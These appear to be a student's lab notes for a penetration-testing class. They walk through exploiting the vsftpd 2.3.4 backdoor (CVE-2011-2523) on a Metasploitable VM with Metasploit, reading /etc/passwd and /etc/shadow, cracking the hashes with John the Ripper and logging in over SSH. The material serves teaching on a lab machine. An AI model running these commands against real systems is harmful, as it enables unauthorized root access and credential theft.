Lesson 4 Lab Notes
In this lab we will do the following:
- Use the saved NMap results to search for the VSFTPD daemon
- Use the VSFTPD v2.3.4 Backdoor Command Execution Exploit to obtain root access.
- Grab all hashes and crack the hashes using with John the Ripper.
- http://computersecuritystudent.com/SECURITY_TOOLS/METASPLOITABLE/EXPLOIT/lesson10/index.html
What is VSFTPD?
vsftpd, which stands for "Very Secure FTP Daemon", is an FTP server for Unix-like systems, including Linux.
CVE Information:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
In July 2011, it was discovered that vsftpd version 2.3.4 downloadable from the master site had been compromised. Users logging into a compromised vsftpd-2.3.4 server may issue a ":)" smileyface as the username and gain a command shell on port 6200. This was not an issue of a security hole in vsftpd, instead, someone had uploaded a different version of vsftpd which contained a backdoor. Since then, the site was moved to Google App Engine.
Module Information:
Rapid7 shows you what metasploit module to use https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor#
And exploit-db, shows you the code of the module https://www.exploit-db.com/exploits/17491/
Instructions:
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOST 172.16.56.2
exploit -j
sessions -l
sessions -i 1
whoami
hostname
Grab the hash!
Type CTRL+Z to background your current shell session
CTRL+Z
search hashdump
use post/linux/gather/hashdump
show options
set SESSION 2
exploit
This should work but it does not. If you can tell me why this part of the exploit fails I will give you crewhu. Anyways, we can still dump the hashes manually. Follow these steps.
sessions -i 1
cat /etc/passwd (this is where the user accounts are located)
Copy the output, open a new terminal and paste into a text file.
gedit passwd.txt
Switch back to our shell session.
cat /etc/shadow (this is where the password hashes are located)
Every mention of $1 in the output is Md5, plus salt and encrypted password. Copy the output, open a new terminal and paste into a text file.
Now we have the user accounts in one file and the password hashes in another file we need to combine the two files and unshadow them.
unshadow passwd.txt shadow.txt > unshadow.txt
If we cat the unshadow.txt we will see that it combined the two files
cat unshadow.txt
Now we have the user accounts and password hashes combined into one file, let's use John the Ripper to crack the hashes for us. DO NOT USE HYDRA, IT CAN CRASH YOUR VM!
john unshadow.txt
John will output the passwords for the passwords it cracked. The msfadmin account has root privileges, we can use those credentials to ssh to the server.
ssh -l msfadmin 172.16.56.2
msfadmin
Now we have terminal access via ssh! The shell access we got initially is as good as gold but terminal access to our victim is better because it allows you to communicate to the server natively with full features of ssh as well.